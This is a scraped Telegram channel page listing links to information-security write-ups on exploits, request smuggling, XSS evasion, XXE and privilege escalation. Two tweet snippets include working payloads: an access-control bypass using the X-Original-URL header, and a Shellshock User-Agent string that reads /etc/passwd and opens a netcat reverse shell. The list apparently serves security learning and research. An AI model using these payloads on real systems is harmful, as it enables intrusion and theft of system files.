Telegram Web Link
bootg.com
»
United States
»
Information Security
» Telegram Web
Information Security
https://medium.com/@datafarm.cybersecurity/exploiting-sigred-cve-2020-1350-on-windows-server-2012-2016-2019-80dd88594228
Medium
Exploiting SIGRed (CVE-2020–1350) on Windows Server 2012/2016/2019
by Worawit Wangwarunyoo , DATAFARM Research Team, Datafarm Company Limited
Information Security
https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
Medium
The Powerful HTTP Request Smuggling
💪
TL;DR: This is how I was able to exploit a HTTP Request Smuggling in a Mobile Device Management (MDM) servers and send any MDM command to…
Information Security
https://www.gremwell.com/firefox-xss-302
Information Security
https://twitter.com/hunter0x7/status/1312110348841840640?s=20
Twitter
Ahsan Khan
GET /admin HTTP/1.1 Host: https://t.co/kc0BFkaTX3 ... Access is denied GET /test HTTP/1.1 Host: https://t.co/kc0BFkaTX3 X-Original-URL: /admin HTTP/1.1 200 OK
Information Security
https://3os.org/raspberryPi/TOR-Pi/
3os.org
TorPi - Raspberry Pi Tor AP - 3os
Raspberry Pi - Raspberry Pi Tor Access Point Guide, Tor proxy, Raspberry Pi 2, Raspberry Pi 3, Raspberry Pi 4
Information Security
https://medium.com/bugbountywriteup/hacking-the-medium-partner-program-84c0e9fa340
Medium
Hacking the Medium partner program
How my name was added to humans.txt for scoring my first bug bounty, a severity 2 one at that!
Information Security
https://ninetyn1ne.github.io/2020-10-05-open-redir-to-ato/
Home
Watch your requests!
open redirect to a complete account takeover
Information Security
https://mazinahmed.net/uploads/Evading%20All%20Web-Application%20Firewalls%20XSS%20Filters.pdf
Information Security
https://github.com/GainSec/GoldenNuggets-1
GitHub
GitHub - GainSec/GoldenNuggets-1: Burp Extension for easily creating Wordlists
Burp Extension for easily creating Wordlists. Contribute to GainSec/GoldenNuggets-1 development by creating an account on GitHub.
Information Security
http://www.missoumsai.com/google-csrfs.html
Information Security
https://medium.com/@nasbench/a-deep-dive-into-rundll32-exe-642344b41e90
Medium
A Deep Dive Into RUNDLL32.EXE
Understanding “rundll32.exe” command line arguments
Information Security
https://securitylab.github.com/research/ubuntu-apport-CVE-2019-15790
GitHub Security Lab
Ubuntu apport PID recycling vulnerability (CVE-2019-15790)
This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).
Information Security
https://i.blackhat.com/asia-20/Friday/asia-20-Yuval-Avrahami-Escaping-Virtualized-Containers.pdf
Information Security
https://dtm.uk/wuauclt/
@dtmsecurity
Code execution via the Windows Update client (wuauclt)
Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.
Today I wanted to share…
Information Security
https://twitter.com/hunter0x7/status/1315541095783292929
Twitter
Ahsan Khan
Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash
Information Security
https://blog.dixitaditya.com/one-click-ssl-pinning-bypass-setup
All Things Security
One-click SSL-Pinning Bypass Setup
This article provides an easy single-click Frida installation script and walkthrough for Android application pentests.
Information Security
https://sidechannel.tempestsi.com/html-to-pdf-converters-can-i-hack-them-a681cfee0903
Information Security
https://medium.com/bugbountywriteup/hacking-http-cors-from-inside-out-512cb125c528?source=rss----7b722bfd1b8d---4
Medium
Hacking HTTP CORS from inside out: a theory to practice approach
A theory to practice approach
Information Security
https://h0mbre.github.io/RyzenMaster_CVE/
The Human Machine Interface
CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys
Background Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.
Information Security
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/
GoSecure
Automating local DTD discovery for XXE exploitation
Today, we present the method to exploit XXEs with local a Document Type Declaration (DTD) file. More specifically, how we have built a huge list of reusable DTD files.
2024/11/20 00:37:26
Back to Top
HTML Embed Code:
TW
HK
DE
US
CA
RU
NO
CN
UA
SG
YE
IN
SA
FR
IQ
UK
EG